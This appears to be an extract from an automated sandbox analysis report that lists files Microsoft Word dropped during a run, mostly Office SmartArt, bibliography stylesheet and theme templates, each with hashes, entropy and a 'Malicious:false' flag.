                                        Category:dropped
                                        Size (bytes):264
                                        Entropy (8bit):3.4866056878458096
                                        Encrypted:false
                                        SSDEEP:6:fxnxUX0XrZUloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXWloGHmD0+dAH/luWvv
                                        MD5:6C489D45F3B56845E68BE07EA804C698
                                        SHA1:C4C9012C0159770CB882870D4C92C307126CEC3F
                                        SHA-256:3FE447260CDCDEE287B8D01CF5F9F53738BFD6AAEC9FB9787F2826F8DEF1CA45
                                        SHA-512:D1355C48A09E7317773E4F1613C4613B7EA42D21F5A6692031D288D69D47B19E8F4D5A29AFD8B751B353FC7DE865EAE7CFE3F0BEC05F33DDF79526D64A29EB18
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.A.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                        Category:dropped
                                        Size (bytes):6448
                                        Entropy (8bit):7.897260397307811
                                        Encrypted:false
                                        SSDEEP:192:tgaoRbo1sMjb0NiJ85oPtqcS+yaXWoa8XBzdJYnLYFtWT7:LR1sk+i4o1qc1yaukzd8MK
                                        MD5:42A840DC06727E42D42C352703EC72AA
                                        SHA1:21AAAF517AFB76BF1AF4E06134786B1716241D29
                                        SHA-256:02CCE7D526F844F70093AC41731D1A1E9B040905DCBA63BA8BFFC0DBD4D3A7A7
                                        SHA-512:8886BFD240D070237317352DEB3D46C6B07E392EBD57730B1DED016BD8740E75B9965F7A3FCD43796864F32AAE0BE911AB1A670E9CCC70E0774F64B1BDA93488
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):290
                                        Entropy (8bit):3.5161159456784024
                                        Encrypted:false
                                        SSDEEP:6:fxnxUX+l8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyulNGHmD0wbnKYZAH/lMZqiv
                                        MD5:C15EB3F4306EBF75D1E7C3C9382DEECC
                                        SHA1:A3F9684794FFD59151A80F97770D4A79F1D030A6
                                        SHA-256:23C262DF3AEACB125E88C8FFB7DBF56FD23F66E0D476AFD842A68DDE69658C7F
                                        SHA-512:ACDF7D69A815C42223FD6300179A991A379F7166EFAABEE41A3995FB2030CD41D8BCD46B566B56D1DFBAE8557AFA1D9FD55143900A506FA733DE9DA5D73389D6
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .t.u.r.a.b.i.a.n...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):344303
                                        Entropy (8bit):5.023195898304535
                                        Encrypted:false
                                        SSDEEP:6144:UwprANnsqvtfL/vF/bkWPRMMv7EOMBPitjASjTQQr7IwR0TnyDk1b78plJwf33iD:6
                                        MD5:F079EC5E2CCB9CD4529673BCDFB90486
                                        SHA1:FBA6696E6FA918F52997193168867DD3AEBE1AD6
                                        SHA-256:3B651258F4D0EE1BFFC7FB189250DED1B920475D1682370D6685769E3A9346DB
                                        SHA-512:4FFFA59863F94B3778F321DA16C43B92A3053E024BDD8C5317077EA1ECC7B09F67ECE3C377DB693F3432BF1E2D947EC5BF8E88E19157ED08632537D8437C87D6
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$pa
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):246
                                        Entropy (8bit):3.5039994158393686
                                        Encrypted:false
                                        SSDEEP:6:fxnxUX4f+E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyvGHmD0+dAH/luWvv
                                        MD5:16711B951E1130126E240A6E4CC2E382
                                        SHA1:8095AA79AEE029FD06428244CA2A6F28408448DB
                                        SHA-256:855342FE16234F72DA0C2765455B69CF412948CFBE70DE5F6D75A20ACDE29AE9
                                        SHA-512:454EAA0FD669489583C317699BE1CE5D706C31058B08CF2731A7621FDEFB6609C2F648E02A7A4B2B3A3DFA8406A696D1A6FA5063DDA684BDA4450A2E9FEFB0EF
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.a.b.b.e.d.A.r.c...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                        Category:dropped
                                        Size (bytes):3683
                                        Entropy (8bit):7.772039166640107
                                        Encrypted:false
                                        SSDEEP:96:GyfQZd6ZHNCWl9aXFkZwIq/QDsRYPf8P9QtDIs5r:G6wYtNZS1k99AmPfSOtD5r
                                        MD5:E8308DA3D46D0BC30857243E1B7D330D
                                        SHA1:C7F8E54A63EB254C194A23137F269185E07F9D10
                                        SHA-256:6534D4D7EF31B967DD0A20AFFF092F8B93D3C0EFCBF19D06833F223A65C6E7C4
                                        SHA-512:88AB7263B7A8D7DDE1225AE588842E07DF3CE7A07CBD937B7E26DA7DA7CFED23F9C12730D9EF4BC1ACF26506A2A96E07875A1A40C2AD55AD1791371EE674A09B
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):286
                                        Entropy (8bit):3.538396048757031
                                        Encrypted:false
                                        SSDEEP:6:fxnxUXcel8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyMelNGHmD0wbnKYZAH/lMZqiv
                                        MD5:149948E41627BE5DC454558E12AF2DA4
                                        SHA1:DB72388C037F0B638FCD007FAB46C916249720A8
                                        SHA-256:1B981DC422A042CDDEBE2543C57ED3D468288C20D280FF9A9E2BB4CC8F4776ED
                                        SHA-512:070B55B305DB48F7A8CD549A5AECF37DE9D6DCD780A5EC546B4BB2165AF4600FA2AF350DDDB48BECCAA3ED954AEE90F5C06C3183310B081F555389060FF4CB01
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .s.i.s.t.0.2...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):250983
                                        Entropy (8bit):5.057714239438731
                                        Encrypted:false
                                        SSDEEP:6144:JwprA6OS95vtfb8p4bgWPzkhUh9I5/oBRSifJeg/yQzvapSiQhHZeruvoXMUw3im:uP
                                        MD5:F883B260A8D67082EA895C14BF56DD56
                                        SHA1:7954565C1F243D46AD3B1E2F1BAF3281451FC14B
                                        SHA-256:EF4835DB41A485B56C2EF0FF7094BC2350460573A686182BC45FD6613480E353
                                        SHA-512:D95924A499F32D9B4D9A7D298502181F9E9048C21DBE0496FA3C3279B263D6F7D594B859111A99B1A53BD248EE69B867D7B1768C42E1E40934E0B990F0CE051E
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):252
                                        Entropy (8bit):3.4680595384446202
                                        Encrypted:false
                                        SSDEEP:6:fxnxUXivlE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyydGHmD0+dAH/luWvv
                                        MD5:D79B5DE6D93AC06005761D88783B3EE6
                                        SHA1:E05BDCE2673B6AA8CBB17A138751EDFA2264DB91
                                        SHA-256:96125D6804544B8D4E6AE8638EFD4BD1F96A1BFB9EEF57337FFF40BA9FF4CDD1
                                        SHA-512:34057F7B2AB273964CB086D8A7DF09A4E05D244A1A27E7589BDC7E5679AB5F587FAB52A2261DB22070DA11EF016F7386635A2B8E54D83730E77A7B142C2E3929
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .a.r.c.h.i.t.e.c.t.u.r.e...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):5783
                                        Entropy (8bit):7.88616857639663
                                        Encrypted:false
                                        SSDEEP:96:CDG4D+8VsXzXc2zLXTJ2XFY47pk2G7HVlwFzTXNbMfmn2ivLZcreFWw5fc9ADdZm:CDG4DRGY23l2Xu47GL7YtT9V29yWvWdk
                                        MD5:8109B3C170E6C2C114164B8947F88AA1
                                        SHA1:FC63956575842219443F4B4C07A8127FBD804C84
                                        SHA-256:F320B4BB4E57825AA4A40E5A61C1C0189D808B3EACE072B35C77F38745A4C416
                                        SHA-512:F8A8D7A6469CD3E7C31F3335DDCC349AD7A686730E1866F130EE36AA9994C52A01545CE73D60B642FFE0EE49972435D183D8CD041F2BB006A6CAF31BAF4924AC
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):256
                                        Entropy (8bit):3.4842773155694724
                                        Encrypted:false
                                        SSDEEP:6:fxnxUXDAlIJAFIloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyMlI7loGHmD0+dAH/luWvv
                                        MD5:923D406B2170497AD4832F0AD3403168
                                        SHA1:A77DA08C9CB909206CDE42FE1543B9FE96DF24FB
                                        SHA-256:EBF9CF474B25DDFE0F6032BA910D5250CBA2F5EDF9CF7E4B3107EDB5C13B50BF
                                        SHA-512:A4CD8C74A3F916CA6B15862FCA83F17F2B1324973CCBCC8B6D9A8AEE63B83A3CD880DC6821EEADFD882D74C7EF58FA586781DED44E00E8B2ABDD367B47CE45B7
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.o.n.v.e.r.g.i.n.g.T.e.x.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                        Category:dropped
                                        Size (bytes):11380
                                        Entropy (8bit):7.891971054886943
                                        Encrypted:false
                                        SSDEEP:192:VJcnLYnAVbOFLaCPLrGGbhaWEu6d3RmryqLkeAShObPb1AYcRMMXjkfa0nYBwggD:VcMC8lLrRbhy1ZqLyShYb1FHQ4C0nYQJ
                                        MD5:C9F9364C659E2F0C626AC0D0BB519062
                                        SHA1:C4036C576074819309D03BB74C188BF902D1AE00
                                        SHA-256:6FC428CA0DCFC27D351736EF16C94D1AB08DDA50CB047A054F37EC028DD08AA2
                                        SHA-512:173A5E68E55163B081C5A8DA24AE46428E3FB326EBE17AE9588C7F7D7E5E5810BFCF08C23C3913D6BEC7369E06725F50387612F697AC6A444875C01A2C94D0FF
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):260
                                        Entropy (8bit):3.4895685222798054
                                        Encrypted:false
                                        SSDEEP:6:fxnxUX4cPBl4xoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyPl4xoGHmD0+dAH/luWvv
                                        MD5:63E8B0621B5DEFE1EF17F02EFBFC2436
                                        SHA1:2D02AD4FD9BF89F453683B7D2B3557BC1EEEE953
                                        SHA-256:9243D99795DCDAD26FA857CB2740E58E3ED581E3FAEF0CB3781CBCD25FB4EE06
                                        SHA-512:A27CDA84DF5AD906C9A60152F166E7BD517266CAA447195E6435997280104CBF83037F7B05AE9D4617323895DCA471117D8C150E32A3855156CB156E15FA5864
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.a.r.y.i.n.g.W.i.d.t.h.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):3075
                                        Entropy (8bit):7.716021191059687
                                        Encrypted:false
                                        SSDEEP:48:96yn4sOBoygpySCCxwKsZCB2oLEIK+aQpUNLRQWtmMamIZxAwCC2QnyODhVOzP4:l0vCxJsZQ2ofpKvtmMdIZxAwJyODhVOE
                                        MD5:67766FF48AF205B771B53AA2FA82B4F4
                                        SHA1:0964F8B9DC737E954E16984A585BDC37CE143D84
                                        SHA-256:160D05B4CB42E1200B859A2DE00770A5C9EBC736B70034AFC832A475372A1667
                                        SHA-512:AC28B0B4A9178E9B424E5893870913D80F4EE03D595F587AA1D3ACC68194153BAFC29436ADFD6EA8992F0B00D17A43CFB42C529829090AF32C3BE591BD41776D
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):256
                                        Entropy (8bit):3.464918006641019
                                        Encrypted:false
                                        SSDEEP:6:fxnxUXR+EqRGRnRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxnyB+5RmRGHmD0wbnKYZAH+Vwv
                                        MD5:93149E194021B37162FD86684ED22401
                                        SHA1:1B31CAEBE1BBFA529092BE834D3B4AD315A6F8F1
                                        SHA-256:50BE99A154A6F632D49B04FCEE6BCA4D6B3B4B7C1377A31CE9FB45C462D697B2
                                        SHA-512:410A7295D470EC85015720B2B4AC592A472ED70A04103D200FA6874BEA6A423AF24766E98E5ACAA3A1DBC32C44E8790E25D4611CD6C0DBFFFE8219D53F33ACA7
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .E.q.u.a.t.i.o.n.s...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Word 2007+
                                        Category:dropped
                                        Size (bytes):51826
                                        Entropy (8bit):5.541375256745271
                                        Encrypted:false
                                        SSDEEP:384:erH5dYPCA4t3aEFGiSUDtYfEbi5Ry/AT7/6tHODaFlDSomurYNfT4A0VIwWNS89u:Q6Cbh9tENyWdaFUSYNfZS89/3qtEu
                                        MD5:2AB22AC99ACFA8A82742E774323C0DBD
                                        SHA1:790F8B56DF79641E83A16E443A75A66E6AA2F244
                                        SHA-256:BC9D45D0419A08840093B0BF4DCF96264C02DFE5BD295CD9B53722E1DA02929D
                                        SHA-512:E5715C0ECF35CE250968BD6DE5744D28A9F57D20FD6866E2AF0B2D8C8F80FEDC741D48F554397D61C5E702DA896BD33EED92D778DBAC71E2E98DCFB0912DE07B
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):262
                                        Entropy (8bit):3.4901887319218092
                                        Encrypted:false
                                        SSDEEP:6:fxnxUXqhBMl0OoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyiMl0OoGHmD0+dAH/luWvv
                                        MD5:52BD0762F3DC77334807DDFC60D5F304
                                        SHA1:5962DA7C58F742046A116DDDA5DC8EA889C4CB0E
                                        SHA-256:30C20CC835E912A6DD89FD1BF5F7D92B233B2EC24594F1C1FE0CADB03A8C3FAB
                                        SHA-512:FB68B1CF9677A00D5651C51EC604B61DAC2D250D44A71D43CD69F41F16E4F0A7BAA7AD4A6F7BB870429297465A893013BBD7CC77A8F709AD6DB97F5A0927B1DD
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .R.a.d.i.a.l.P.i.c.t.u.r.e.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):5596
                                        Entropy (8bit):7.875182123405584
                                        Encrypted:false
                                        SSDEEP:96:dGa2unnLYEB2EUAPOak380NQjqbHaPKJebgrEVws8Vw+BMa0EbdLVQaZJgDZh0pJ:UJunLYEB2EUAxk3pIYaScgYwsV4bdS0X
                                        MD5:CDC1493350011DB9892100E94D5592FE
                                        SHA1:684B444ADE2A8DBE760B54C08F2D28F2D71AD0FA
                                        SHA-256:F637A67799B492FEFFB65632FED7815226396B4102A7ED790E0D9BB4936E1548
                                        SHA-512:3699066A4E8A041079F12E88AB2E7F485E968619CB79175267842846A3AD64AA8E7778CBACDF1117854A7FDCFB46C8025A62F147C81074823778C6B4DC930F12
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):260
                                        Entropy (8bit):3.494357416502254
                                        Encrypted:false
                                        SSDEEP:6:fxnxUX0XPE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXPGHmD0+dAH/luWvv
                                        MD5:6F8FE7B05855C203F6DEC5C31885DD08
                                        SHA1:9CC27D17B654C6205284DECA3278DA0DD0153AFF
                                        SHA-256:B7F58DF058C938CCF39054B31472DC76E18A3764B78B414088A261E440870175
                                        SHA-512:C518A243E51CB4A1E3C227F6A8A8D9532EE111D5A1C86EBBB23BD4328D92CD6A0587DF65B3B40A0BE2576D8755686D2A3A55E10444D5BB09FC4E0194DB70AFE6
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.G.r.i.d...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                        Category:dropped
                                        Size (bytes):6193
                                        Entropy (8bit):7.855499268199703
                                        Encrypted:false
                                        SSDEEP:192:WavHMKgnU2HUGFhUnkbOKoztj1QfcnLYut3d8:YKeUlGXUnC+HQSMp
                                        MD5:031C246FFE0E2B623BBBD231E414E0D2
                                        SHA1:A57CA6134779D54691A4EFD344BC6948E253E0BA
                                        SHA-256:2D76C8D1D59EDB40D1FBBC6406A06577400582D1659A544269500479B6753CF7
                                        SHA-512:6A784C28E12C3740300883A0E690F560072A3EA8199977CBD7F260A21E8346B82BA8A4F78394D3BB53FA2E98564B764C2D0232C40B25FB6085C36D20D70A39D1
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):290
                                        Entropy (8bit):3.5081874837369886
                                        Encrypted:false
                                        SSDEEP:6:fxnxUXCOzi8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnydONGHmD0wbnKYZAH/lMZqiv
                                        MD5:8D9B02CC69FA40564E6C781A9CC9E626
                                        SHA1:352469A1ABB8DA1DC550D7E27924E552B0D39204
                                        SHA-256:1D4483830710EF4A2CC173C3514A9F4B0ACA6C44DB22729B7BE074D18C625BAE
                                        SHA-512:8B7DB2AB339DD8085104855F847C48970C2DD32ADB0B8EEA134A64C5CC7DE772615F85D057F4357703B65166C8CF0C06F4F6FD3E60FFC80DA3DD34B16D5B1281
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.o.s.t.n.a.m.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):255948
                                        Entropy (8bit):5.103631650117028
                                        Encrypted:false
                                        SSDEEP:6144:gwprAm795vtfb8p4bgWPWEtTmtcRCDPThNPFQwB+26RxlsIBkAgRMBHcTCwsHe5a:kW
                                        MD5:9888A214D362470A6189DEFF775BE139
                                        SHA1:32B552EB3C73CD7D0D9D924C96B27A86753E0F97
                                        SHA-256:C64ED5C2A323C00E84272AD3A701CAEBE1DCCEB67231978DE978042F09635FA7
                                        SHA-512:8A75FC2713003FA40B9730D29C786C76A796F30E6ACE12064468DD2BB4BF97EF26AC43FFE1158AB1DB06FF715D2E6CDE8EF3E8B7C49AA1341603CE122F311073
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="utf-8"?>............<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select=
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                        Category:dropped
                                        Size (bytes):924687
                                        Entropy (8bit):7.824849396154325
                                        Encrypted:false
                                        SSDEEP:12288:lsadD3eLxI8XSh4yDwFw8oWR+6dmw2ZpQDKpazILv7Jzny/ApcWqyOpEZULn:qLxI8XSh4yUF/oWR+mLKpYIr7l3ZQ7n
                                        MD5:97EEC245165F2296139EF8D4D43BBB66
                                        SHA1:0D91B68CCB6063EB342CFCED4F21A1CE4115C209
                                        SHA-256:3C5CF7BDB27592791ADF4E7C5A09DDE4658E10ED8F47845064DB1153BE69487C
                                        SHA-512:8594C49CAB6FF8385B1D6E174431DAFB0E947A8D7D3F200E622AE8260C793906E17AA3E6550D4775573858EA1243CCBF7132973CD1CF7A72C3587B9691535FF8
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):282
                                        Entropy (8bit):3.51145753448333
                                        Encrypted:false
                                        SSDEEP:6:Q+sxnxUXKsWkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6svymD0wbnKNAH/lMz1
                                        MD5:7956D2B60E2A254A07D46BCA07D0EFF0
                                        SHA1:AF1AC8CA6FE2F521B2EE2B7ABAB612956A65B0B5
                                        SHA-256:C92B7FD46B4553FF2A656FF5102616479F3B503341ED7A349ECCA2E12455969E
                                        SHA-512:668F5D0EFA2F5168172E746A6C32820E3758793CFA5DB6791DE39CB706EF7123BE641A8134134E579D3E4C77A95A0F9983F90E44C0A1CF6CDE2C4E4C7AF1ECA0
                                        Malicious:false
                                        Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.a.r.a.l.l.a.x...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):1649585
                                        Entropy (8bit):7.875240099125746
                                        Encrypted:false
                                        SSDEEP:24576:L368X6z95zf5BbQ6U79dYy2HiTIxRboyM/LZTl5KnCc:r68kb7UTYxGIxmnp65
                                        MD5:35200E94CEB3BB7A8B34B4E93E039023
                                        SHA1:5BB55EDAA4CDF9D805E36C36FB092E451BDDB74D
                                        SHA-256:6CE04E8827ABAEA9B292048C5F84D824DE3CEFDB493101C2DB207BD4475AF1FD
                                        SHA-512:ED80CEE7C22D10664076BA7558A79485AA39BE80582CEC9A222621764DAE5EFA70F648F8E8C5C83B6FE31C2A9A933C814929782A964A47157505F4AE79A3E2F9
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
